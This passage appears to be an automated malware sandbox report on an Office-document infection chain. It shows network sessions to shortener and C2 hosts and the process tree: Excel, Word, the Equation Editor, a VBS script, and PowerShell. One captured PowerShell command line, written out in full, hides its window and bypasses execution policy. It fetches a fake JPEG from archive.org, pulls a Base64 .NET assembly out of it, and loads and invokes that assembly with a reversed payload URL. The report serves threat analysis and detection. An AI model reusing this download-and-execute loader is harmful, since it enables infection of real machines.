                                                  Aug 16, 2024 09:33:37.462256908 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  x-frame-options: SAMEORIGIN
                                                  x-xss-protection: 1; mode=block
                                                  x-content-type-options: nosniff
                                                  x-download-options: noopen
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: strict-origin-when-cross-origin
                                                  content-type: text/html; charset=utf-8
                                                  etag: W/"f668d0a14f5105d8d48cb2a5cfaf2d4a"
                                                  cache-control: max-age=0, private, must-revalidate
                                                  x-request-id: 3811b54e-10d8-4a84-94a1-b1dfee7018f4
                                                  x-runtime: 0.007635
                                                  transfer-encoding: chunked
                                                  connection: close


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  10 | 192.168.2.22 | 49179 | 103.249.106.91 | 80 | 1980 | C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 16, 2024 09:33:42.648857117 CEST | 2472 | OUT | POST /weeg/ HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.2886080.xyz
                                                  Referer: http://www.2886080.xyz/weeg/
                                                  Content-Length: 2160
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:43.550184965 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:43 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: d404 Not Found0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  11 | 192.168.2.22 | 49180 | 103.249.106.91 | 80 | 1980 | C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 16, 2024 09:33:45.196132898 CEST | 605 | OUT | POST /weeg/ HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.2886080.xyz
                                                  Referer: http://www.2886080.xyz/weeg/
                                                  Content-Length: 200
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:46.273192883 CEST    190    IN    HTTP/1.1 400 Bad Request
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:46 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: d404 Not Found0


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  12    192.168.2.22    49181    103.249.106.91    80    1980    C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  Aug 16, 2024 09:33:47.739265919 CEST    2472    OUT    POST /weeg/ HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.2886080.xyz
                                                  Referer: http://www.2886080.xyz/weeg/
                                                  Content-Length: 3624
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:48.840117931 CEST    190    IN    HTTP/1.1 400 Bad Request
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:48 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: d404 Not Found0


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  13    192.168.2.22    49182    103.249.106.91    80    1980    C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  Aug 16, 2024 09:33:50.278562069 CEST    344    OUT    GET /weeg/?o4=jn1L46&wxW=+t9vfnkbYU1QJIfziniMQm4D0SJKDGsGeZHR+z4AZEyX1J3gptrY73VQNNQ/+mGIVtW5Aqaflf0RAZz5+q7KDi1WF5zu290DE+JeXwSEBwj5ukFt81bZJ4VTl/P9 HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:51.287039042 CEST    1236    IN    HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:51 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Ascii: a42b<!DOCTYPE HTML><html lang="zh-CN"><head><meta charset="utf-8"><title>&#20908;&#26376;&#26539;-&#20813;&#36153;&#27611;&#25773;&#25918;&#29255; &#22312;&#32447;&#25773;&#25918;</title><meta name="keywords" content="&#20908;&#26376;&#26539;" /><meta name="description" content="&#20908;&#26376;&#26539;" />...[if lt IE 9 ]><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/helper/modernizr.js"></script><![endif]--><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/cmstop-common.js"></script><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/jquery.js"></script><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/config.js"></script><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/jquery.cookie.js"></script><link rel="stylesheet" type="text/css" href="http://www.2886080.xyz/template/news/lvse/skin/html/css/style.css" /><scr [TRUNCATED]


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  14    192.168.2.22    49183    85.159.66.93    80    1980    C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  Aug 16, 2024 09:34:05.627365112 CEST    2472    OUT    POST /jwh2/ HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.kcrkimya.xyz
                                                  Referer: http://www.kcrkimya.xyz/jwh2/
                                                  Content-Length: 2160
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:34:06.427290916 CEST    225    IN    HTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:06 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 19
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  15    192.168.2.22    49184    85.159.66.93    80    1980    C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  Aug 16, 2024 09:34:08.291066885 CEST    608    OUT    POST /jwh2/ HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.kcrkimya.xyz
                                                  Referer: http://www.kcrkimya.xyz/jwh2/
                                                  Content-Length: 200
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:34:08.924228907 CEST    225    IN    HTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:08 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 18
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  16    192.168.2.22    49185    85.159.66.93    80    1980    C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  Aug 16, 2024 09:34:10.828927040 CEST    2472    OUT    POST /jwh2/ HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.kcrkimya.xyz
                                                  Referer: http://www.kcrkimya.xyz/jwh2/
                                                  Content-Length: 3624
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:34:11.515023947 CEST    225    IN    HTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:11 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 19
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:16.4085800Z


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  17    192.168.2.22    49186    85.159.66.93    80    1980    C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  Aug 16, 2024 09:34:13.371540070 CEST    345    OUT    GET /jwh2/?wxW=qwiqlQOB2sBJXed4TJefnH6tfhcmjQqGh5LRBgpS3ir2H9BZzfnnysKJE+uuqh+G2a9tjGyTB/t+dcoUENF33bMIpFI3IAf6ffgxGYIPDvPvoCP/fBQOw8HyyZkd&o4=jn1L46 HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:34:14.092205048 CEST    225    IN    HTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:13 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 19
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:18.9812535Z


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  0    192.168.2.22    49161    188.114.97.3    443    2456    C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  2024-08-16 07:32:28 UTC    323    OUT    GET /GmwgTs HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: jiourl.com
                                                  Connection: Keep-Alive
                                                  2024-08-16 07:32:29 UTC    1095    IN    HTTP/1.1 301 Moved Permanently
                                                  Date: Fri, 16 Aug 2024 07:32:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  set-cookie: PHPSESSID=hcig6oebb5o58thjr74ikoff8b; path=/; secure
                                                  set-cookie: short_4447=1; expires=Fri, 16-Aug-2024 07:47:28 GMT; Max-Age=900; path=/; HttpOnly; secure
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  location: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aD0UYWeLXDGW2b%2BZQQDClAWk0k%2FpnEoxo%2B1AziDh1pVlnor68Lf%2BpUPPY%2Bv9E64Hu5sBIoCL7zRsNAoPmDkDH7QY86GM40%2BYFd%2Ftdn7EK88EBDdGigqFStfsGPIh"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb105cdb41db-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-08-16 07:32:29 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                  1    192.168.2.22    49163    188.114.97.3    443    2408    C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Timestamp    Bytes transferred    Direction    Data
                                                  2024-08-16 07:32:31 UTC    154    OUT    OPTIONS / HTTP/1.1
                                                  User-Agent: Microsoft Office Protocol Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1
                                                  2024-08-16 07:32:31 UTC    842    IN    HTTP/1.1 405 Method Not Allowed
                                                  Date: Fri, 16 Aug 2024 07:32:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  set-cookie: PHPSESSID=t8mfuar2m35367i14un824ios2; path=/; secure
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBTImt8exLssqajwhrsnjtMBz5UGOH5dcKYqAu0RijqPT9Ku%2BVUaVXKrNJeLgPj7AQWxRLy2vHQ2uDnOX0eANHPy%2B%2FLEz2pvjpdJacXyZ7GYJDI%2F%2FeD0%2B77rgJX8"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb1ece864344-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.22 | 49164 | 188.114.97.3 | 443 | 2408 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-16 07:32:32 UTC | 192 | OUT | OPTIONS / HTTP/1.1
                                                  User-Agent: Microsoft Office Protocol Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  2024-08-16 07:32:32 UTC | 768 | IN | HTTP/1.1 405 Method Not Allowed
                                                  Date: Fri, 16 Aug 2024 07:32:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=46f%2FTsarNQVWWzmz4aFUDurhJ%2BBvXh2PY5fGzNHWRghCUKgTpneTNPwGrbiinfSldM0i4e27yTyDEVw9H8z4YsBqjl3bd6kIkzEE2E9TXECRvD4Yez9pgep5XmTF"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb25ff5f7d00-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.22 | 49165 | 188.114.97.3 | 443 | 2408 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-16 07:32:33 UTC | 192 | OUT | OPTIONS / HTTP/1.1
                                                  User-Agent: Microsoft Office Protocol Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  2024-08-16 07:32:33 UTC | 770 | IN | HTTP/1.1 405 Method Not Allowed
                                                  Date: Fri, 16 Aug 2024 07:32:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILA7cBj0qlVdm7ZWQsEwE4DamNzPtyG0v9cUl%2FFJVBJh%2B%2FS3g6iD0U2W0hwyAqZhQ1jxnahHjRVQeJMuBdL6563lYvQCcLoWRWk92uf7AqVbCxuyf2SxxGQaSXoo"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb2ae8955e82-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | 2408 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-16 07:32:34 UTC | 177 | OUT | HEAD /GmwgTs HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Host: jiourl.com
                                                  2024-08-16 07:32:35 UTC | 885 | IN | HTTP/1.1 301 Moved Permanently
                                                  Date: Fri, 16 Aug 2024 07:32:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  location: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc
                                                  x-turbo-charged-by: LiteSpeed
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6kkGor9vHRVIfGe9BDdi0eePGDBousK9ZW3brsZYRikuLTzn%2BVLaZorKPjytoGOv3GjjdVAHdn23Ls7n9x7SyovVkhbmoAzH1SsoYs2qzvFdaXYFE4jlPsFxm9N"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb3608b042c0-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.22 | 49168 | 188.114.97.3 | 443 | 2408 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-16 07:32:39 UTC | 196 | OUT | HEAD /GmwgTs HTTP/1.1
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  2024-08-16 07:32:39 UTC | 889 | IN | HTTP/1.1 301 Moved Permanently
                                                  Date: Fri, 16 Aug 2024 07:32:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  location: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xL3gzPc8K7%2Bx7tICv8u432djQVtcYovlcrF%2F5aGsHXQhrPtjteudamG6VpvKIXM1iq2weBRsHutkX%2FiyxBO9WZdda6joX6HktCCsBHzFgh0OsDLyiQ7Y3wNztX4D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb53aaa24319-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.22 | 49171 | 207.241.232.154 | 443 | 3248 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-16 07:32:46 UTC | 111 | OUT | GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                  Host: ia803104.us.archive.org
                                                  Connection: Keep-Alive
                                                  2024-08-16 07:32:46 UTC | 591 | IN | HTTP/1.1 200 OK
                                                  Server: nginx/1.24.0 (Ubuntu)
                                                  Date: Fri, 16 Aug 2024 07:32:46 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 1931225
                                                  Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                  Connection: close
                                                  ETag: "66a41ab4-1d77d9"
                                                  Strict-Transport-Security: max-age=15724800
                                                  Expires: Fri, 16 Aug 2024 13:32:46 GMT
                                                  Cache-Control: max-age=21600
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                  Access-Control-Allow-Credentials: true
                                                  Accept-Ranges: bytes



                                                  Target ID:0
                                                  Start time:03:32:07
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13fcd0000
                                                  File size:28'253'536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:03:32:28
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                  Imagebase:0x13fe10000
                                                  File size:1'423'704 bytes
                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:03:32:39
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543'304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:03:32:41
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
                                                  Imagebase:0xc00000
                                                  File size:141'824 bytes
                                                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:03:32:41
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                  Imagebase:0xfa0000
                                                  File size:427'008 bytes
                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:03:32:43
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                  Imagebase:0xfa0000
                                                  File size:427'008 bytes
                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:03:32:48
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  Wow64 process (32bit):true
